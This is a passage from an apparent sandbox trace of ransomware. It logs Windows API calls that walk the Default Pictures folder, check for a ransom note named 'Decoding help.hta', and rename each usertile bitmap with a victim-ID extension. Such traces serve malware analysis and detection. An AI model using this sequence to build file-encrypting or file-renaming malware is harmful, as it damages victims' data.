Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x1 [0058.124] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile35.bmp") returned -1 [0058.124] lstrlenW (lpString="usertile35.bmp") returned 14 [0058.124] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.124] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.124] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile35.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp" [0058.124] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp" [0058.124] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.124] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile35.bmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile35.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.124] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae548fb8, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae548fb8, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd9ef6bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile36.bmp", cAlternateFileName="")) returned 1 [0058.125] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.125] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.125] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0058.125] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x1 [0058.125] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile36.bmp") returned -1 [0058.125] lstrlenW (lpString="usertile36.bmp") returned 14 [0058.125] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.125] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.125] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile36.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp" [0058.125] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp" [0058.125] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.125] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile36.bmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile36.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.125] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae595272, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae595272, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddb6c46b, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile37.bmp", cAlternateFileName="")) returned 1 [0058.125] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.125] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.125] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0058.125] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x1 [0058.125] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile37.bmp") returned -1 [0058.126] lstrlenW (lpString="usertile37.bmp") returned 14 [0058.126] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.126] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.126] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile37.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp" [0058.126] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp" [0058.126] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.126] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile37.bmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile37.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.126] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5bb3cf, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae5bb3cf, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddb6c46b, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile38.bmp", cAlternateFileName="")) returned 1 [0058.126] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.126] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.126] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0058.126] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x1 [0058.126] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile38.bmp") returned -1 [0058.126] lstrlenW (lpString="usertile38.bmp") returned 14 [0058.126] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.126] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.126] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile38.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp" [0058.126] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp" [0058.126] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.126] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile38.bmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile38.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.127] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5e152c, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae5e152c, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddc2ab41, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile39.bmp", cAlternateFileName="")) returned 1 [0058.127] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.127] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.127] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0058.127] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x1 [0058.127] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile39.bmp") returned -1 [0058.127] lstrlenW (lpString="usertile39.bmp") returned 14 [0058.127] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.127] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.127] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile39.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp" [0058.127] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp" [0058.127] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.127] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile39.bmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile39.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.127] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae607689, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae607689, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddc50c9f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile40.bmp", cAlternateFileName="")) returned 1 [0058.127] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.127] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.127] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0058.127] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x1 [0058.128] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile40.bmp") returned -1 [0058.128] lstrlenW (lpString="usertile40.bmp") returned 14 [0058.128] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.128] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.128] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile40.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp" [0058.128] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp" [0058.128] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.128] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile40.bmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile40.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.128] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae62d7e6, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae62d7e6, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddcc30b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile41.bmp", cAlternateFileName="")) returned 1 [0058.128] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.128] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.128] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0058.128] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x1 [0058.128] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile41.bmp") returned -1 [0058.128] lstrlenW (lpString="usertile41.bmp") returned 14 [0058.128] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.128] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.128] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile41.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp" [0058.128] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp" [0058.129] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.129] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile41.bmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile41.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.129] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae653943, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae653943, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddce9217, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile42.bmp", cAlternateFileName="")) returned 1 [0058.129] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.129] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.129] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", 